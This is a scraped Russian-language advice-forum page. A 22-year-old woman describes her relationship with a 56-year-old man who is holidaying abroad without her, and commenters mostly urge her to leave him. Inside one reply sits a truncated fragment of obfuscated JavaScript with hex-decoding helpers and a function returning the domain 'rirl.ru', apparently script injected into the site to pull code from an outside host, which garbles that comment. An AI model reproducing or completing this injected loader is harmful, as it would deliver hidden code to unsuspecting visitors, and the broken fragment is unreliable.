Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-02 17:29:05 от Гость
Здравствуйте, мне грустно от того, что я не могу общаться с одним парнем, точнее он не хочет что б я была его девушка, потому что я не религиозная и не следую исламу, он сам верующий, наверно вы сейчас подумаете почему я не следую исламу?, он сказал ... Подробнее
Последний комментарий
История : Любовь к отцу и матери
1 минуту назад2016-12-03 10:47:06 от Неалина
5436Автор, как то вы так близко приняли мнения в моей теме. Я не скажу, что я зла на отца. Я не сержусь на него. Но моя жизнь связана с мамой и ее родителями, которые меня вырастили и по жизни поддержали. Отца нет уже давно. Я его не помню, знаю только по фото. Поэтому мама мне родной человек. Как и ... Все комментарии67552
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Советы
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Комедия
27 ноября в 16:31:09
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Лев
23 ноября в 17:13:44
Лев
21 ноября в 22:04:47
Советы - Все понимаю, а все равно не могу...
Советы : Все понимаю, а все равно не могу...     Здравствуйте, живем с мужчиной около года вместе, встречаемся также. Мужчина старше меня на очень много лет, буквально вчера сообщает мне, что он уезжает в конце месяца в Доминикану отдыхать. Я не особо то и обрадовалась, бесит то, что он что то там спланировал сам, не знаю сколько времени назад, и даже мне об этом не сказал. Сказал, что раньше говорить об этом не было смысла, потому что якобы он не знал когда будет горящая путевка, и он уедет. А вот вчера позвонила знакомая из тур агенства, сказала что есть путевка недорого. Но почему этого раньше нельзя было сказать, он ведь знал, что в любом случае поедет туда, не в мае, так в июне. Я расстроилась, может быть, сказал бы он раньше об этом, я бы морально подготовилась, и было бы все не так, как вчера. Далее у нас завязался разговор, он сказал, что он бесперспективен для меня, ему уже "куча" лет, мне нужен молодой парень (об этом он мне и раньше говорил, в самом начале отношений, что не на что надеяться, детей совместных не будет, свадьбы тоже). Я все это знаю, но уйти не могу, я банально привыкла к нему, прикипела. Мне это больно осознавать, что ситуация настолько безнадежна. Я спросила у него, почему тогда ты стал со мной встречаться (если знал изначально, что отношения обречены),он перевел тему. Мозгами все понимаю, а сердце не хочет слушать меня.
64595
Другие Советы
(22)
Старик
Старик

15 мая 22:49:59
2016-05-15 22:49:59
Все равно бросишь, дает тебе шанс пораньше. Я так одну молодую бросил, понял, что в будущем уйдет, у нее еще характер шаловливый был.
Ответить
Поддерживаю Да0 / Нет0
Безнадега
Безнадега

15 мая 23:34:00
2016-05-15 23:34:00
Старик, у меня такие же мысли, создает условия, чтобы его бросили. А насчет будущего, он мне и сам говорил, что у нас его нет, но не от того что я какая то "шаловливая", а просто потому что он не молодеет и не хочет чтобы я потом за ним утку носила.
Ответить
Поддерживаю Да0 / Нет0
Dевушк@
3954 Dевушк@
Dевушк@ offline
Репутация : 235647
Комментариев 1760 1
16 мая 00:10:24
2016-05-16 00:10:24

Безнадега , а чего без вас онтедет? Может с кем-то помрлодее?

Ответить
Поддерживаю Да0 / Нет0
Farba
11357 Farba
Farba offline
Репутация : 123226
Комментариев 1521 1
16 мая 00:45:26
2016-05-16 00:45:26
На те деньги, что он потратит на Доминикану , он мог бы вдвоем с вами съездить куда-нибудь в Болгарию или в Грецию. Он этого не сделал, так что делайте выводы, насколько вы ему нужны. На самом деле бросить мужчину несложно, если вы примете это как необходимость - нужно бросить, и все, это не обсуждается. А потом наверняка найдете другого, может в сто раз лучше.
Ответить
Поддерживаю Да2 / Нет0
Безнадега
Безнадега

16 мая 00:48:36
2016-05-16 00:48:36
Dевушк@, а я не знаю, почему без меня. Как то наглости не хватило об этом спросить. Деньги, наверняка, тратить на меня не хочет. Помоложе, не думаю, мне 22.
Ответить
Поддерживаю Да1 / Нет0
Безнадега
Безнадега

16 мая 01:55:55
2016-05-16 01:55:55
Farba, видимо, нет такой необходимости, тратить на меня деньги. Все тут ясно и понятно мне. Еще спросил меня, почему я за него не порадовалась!? Сейчас, во мне что то перевернулось, как то стала по другому смотреть на наши с ним отношения. Не потому что он меня не берет с собой, а просто потому что сам что то планирует, думает, а я так, просто так рядом с ним. Обидно!
Ответить
Поддерживаю Да2 / Нет0
@Lelik@
12904 @Lelik@
@Lelik@ offline
Репутация : 14609
Комментариев 158 13
16 мая 06:30:40
2016-05-16 06:30:40

Мужчины ( да простит меня сильный пол) трусы в плане отношений, им лучше если примут решения за них, а они как будто в стороне, что не он бросил, козел этакий, а от него ушли, бедного несчастного. А он молодец, создает вам все условия для этого) Мой вам совет, пусть едет отдыхать, сил набираться, а вы в это время его вещички остальные соберите, у двери оставьте, и если есть возможность тоже езжайте отдохнуть) Вам всего 22, и тратить на этого человека свое время бессмысленно!

Ответить
Поддерживаю Да1 / Нет0
вовочка
вовочка

16 мая 12:08:31
2016-05-16 12:08:31
Безнадега , Ты должна была показать, преданную любовь в Реале и сказать, что и утка не проблема, тогда бы он был уверен. Мы же не знаем, как вы там живете, может скандалите, изменяете и. т. д. ?
Ответить
Поддерживаю Да0 / Нет3
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 121205
Комментариев 1101 17
16 мая 14:41:27
2016-05-16 14:41:27

@Lelik@, 100 % в точку. Еще какие трусы! Мне бывший создал такие условия, что я сама уже начала встречаться с другим человеком, и вот тогда , конечно, оказалась виновной в расставании я) А он , счастливый, и такой весь "порядочный" (у самого уже была другая, все не решался от меня уйти) , ушел наконец-таки восвояси. Не хотел перед моей мамой выглядеть плохим, то есть самому раньше уйти (как только повстречалась другая) Вполне возможно, автор, что Ваш мужчина когда-нибудь уже настроен с Вами на расставание, ибо любящий Вас будет не только посвящать в свои планы заблаговременно, но и считаться с Вами. Мог бы спросить: Было бы здорово нам с тобой вместе куда-нибудь съездить? Куда ты хочешь? Я вот, например, в Доминикану и т. д

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да1 / Нет0
Scientific
6424 Scientific
Scientific offline
Репутация : 230647
Комментариев 3219 0
16 мая 16:27:08
2016-05-16 16:27:08

"а сердце не хочет слушать меня. "
Это не сердце...

Ответить
Поддерживаю Да0 / Нет0
Безнадега
Безнадега

16 мая 16:44:00
2016-05-16 16:44:00
шоколадочка , в том то все и дело( писала я, не писала в истории), что он мне изначально говорил о том, что детей у нас совместных не будет, свадьбы тоже. Говорил, что в силу возраста, мы не сможем быть в дальнейшем вместе, ему 56, и не известно что будет дальше. Я склонна думать, что у него и в предыдущих отношениях все на таком принципе строилось, жена отдыхает отдельно, он отдельно. А сегодня он на мой вопрос ответила так, я же тебе говорил, что собирался туда (или хотел, я точно не помню). Но собираться и планировать вовсю свою поездку, не одно и тоже. Вот тебе и "сильный" пол, как они боятся ответственности.
Ответить
Поддерживаю Да0 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 121205
Комментариев 1101 17
16 мая 19:38:11
2016-05-16 19:38:11

Безнадега , ну и зачем Вам 56 летний? Вам ведь 22 года, как я поняла? Поиграется с Вами, как с ребенком и был таков. У меня раньше тоже разница в возрасте была с мужчиной приличная, такой прям весь серьезный и ответственный казался, прям смешно вспоминать его пустую философию. Говорил "бла-бла-бла" и возраст ему был не помехой, а потом совсем другие слова были . Вообще, конечно, не в возрасте дело. Ему может быть и 56, а серьезности -никакой. Встретите своего еще человека, даже не переживайте. Махните рукой и пусть себе едет!

Ответить
Поддерживаю Да3 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 121205
Комментариев 1101 17
16 мая 19:39:31
2016-05-16 19:39:31

и пусть себе едет хоть в Африку. ) Отпустите его. Сами потом еще радоваться будете.

Ответить
Поддерживаю Да3 / Нет0
Безнадега
Безнадега

16 мая 20:11:59
2016-05-16 20:11:59
Scientific , а что же тогда?
Ответить
Поддерживаю Да0 / Нет0
Неалина
5436 Неалина
Неалина online
Репутация : 441737
Комментариев 7600 30
17 мая 10:26:23
2016-05-17 10:26:23

Безнадега , Согласна с шоколадочка , зачем он вам в 56 лет, если вам 22. Отправьте его в свободное плавание. Пусть катится. Вам надо строить свою жизнь, а у него уже все слаженно. И я вообще не пойму почему вас не задевает то что он едет без вас отдыхать?То есть если вы стираете и готовите живя с ним почти год на него то это нормально для него. А отдыхать отдельно от вас ему нравится больше. Эгоист какой то честное слово в его 56 лет. и не видно вообще что вы ему нужны. Он вам такие вещи говорит, что детей не будет, брака не будет. То есть ничего не будет совсем у вас с ним. Не тратьте свои молодые и драгоценные годы на него и пустые отношения с ним. Зрелые годы впереди, старость тоже и только молодость уже не вернешь назад как и детство.

Раз вы все понимаете то просто сделайте это-уйдите от него и тут не важно кто виноват и кто ушел из вас он или вы. Вы сделаете для себя в первую очередь доброе дело, освободите себя от него. Конечно вы пострадаете по началу, но в молодости все это переживается легче, чем потом. Просто возьмите себя в руки и сделайте то что все равно не избежно для вас.

Ответить
Поддерживаю Да2 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Scientific
6424 Scientific
Scientific offline
Репутация : 230647
Комментариев 3219 0
17 мая 12:05:38
2016-05-17 12:05:38

Любовь исходит из сердца. А это не любовь - это (как говорят классики) "морок". А настоящая любовь - она не такая, как то, что Вы описываете. Ничего, полюбите - поймёте.

Ответить
Поддерживаю Да0 / Нет0
Безнадега
Безнадега

17 мая 12:48:15
2016-05-17 12:48:15
Неалина, знаете, он мне как то сказал, что он для меня будет только учителем, помогать где то что то, советом, морально, не более. Я сама понимала, что ничего более не будет, точнее совместного мы ничего не создадим. Но вот не знаю, почему я продолжила с ним отношения. А не берет он меня, просто, наверное не видит смысла так траться на меня, я только этот ответ вижу. И потом, я ему не жена, обязательств передо мной у него нет, наверное, еще и поэтому не берет. Типа, хочу отдохнуть один, я ж не обязан брать ее (меня). И нагло спросить у него у меня тоже не повернется язык, почему ты меня не берешь с собой. Я все понимаю, но блин, эта Привычка(((( Я просто не могу представить, что мы будем в одном городе находиться, и он где то сам будет по себе, а я сама, даже не общаясь с друг другом. Вы все правильно пишите, я все это сама осознаю, но не могу сделать этот шаг, не могу на него решиться!
Ответить
Поддерживаю Да0 / Нет0
Безнадега
21242 Безнадега
Безнадега offline
Репутация : 0
Комментариев 1 0
17 мая 12:48:49
2016-05-17 12:48:49
Scientific , кому как видится, не буду разубеждать. Все равно не видите отношения изнутри ведь.
Ответить
Поддерживаю Да0 / Нет0
Неалина
5436 Неалина
Неалина online
Репутация : 441737
Комментариев 7600 30
17 мая 13:55:37
2016-05-17 13:55:37

Безнадега , Вы тоже можете не готовить ему, не стирать. Ведь по сути вы ему никто. Так живете вместе. Что значит он не хочет тратится на вас?Зачем он вообще тогда с вами сходился?Молодого тела захотелось?И вообще чему он вас учит?Как жить с мужчиной а отдыхать он будет отдельно?Вы уверена что вам такие уроки нужны?Или как жить с мужчиной который в глаза говорит что детей не будет, брака тоже?Ложь ето все что он как учитель для вас!Плохой педагог из него и программа из его уроков отрицательная!

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Scientific
6424 Scientific
Scientific offline
Репутация : 230647
Комментариев 3219 0
17 мая 17:30:39
2016-05-17 17:30:39

Ветеринары корову изнутри тоже не видят, а по-наружним признакам болезни всё-таки определяют (причём лучше самой коровы).

Ответить
Поддерживаю Да1 / Нет0
Неалина
5436 Неалина
Неалина online
Репутация : 441737
Комментариев 7600 30
17 мая 18:20:34
2016-05-17 18:20:34

Scientific , Вы сейчас о чем?Какие коровы и ветеринары?И про какие болезни речь?

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Катерина
Катерина

18 мая 14:09:54
2016-05-18 14:09:54
Автор, Что за чушь, жена Вы или нет!?Вы живете вместе, что значит поехал отдыхать один???Я вообще, не понимают, о чем можно тут говорить?ВАМ ВСЕГО 22!!!Разве не хочется семью?нормальную Где вместе ездят отдыхать, заботятся друг о друге!Боятся уйти от Деда, ну это просто смешно. Я бы еще поняла когда он финансово обеспечивает..... а тут нужно СРОЧНО забывать такие отношения, хотя тут не понятно что!
Ответить
Поддерживаю Да0 / Нет0
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке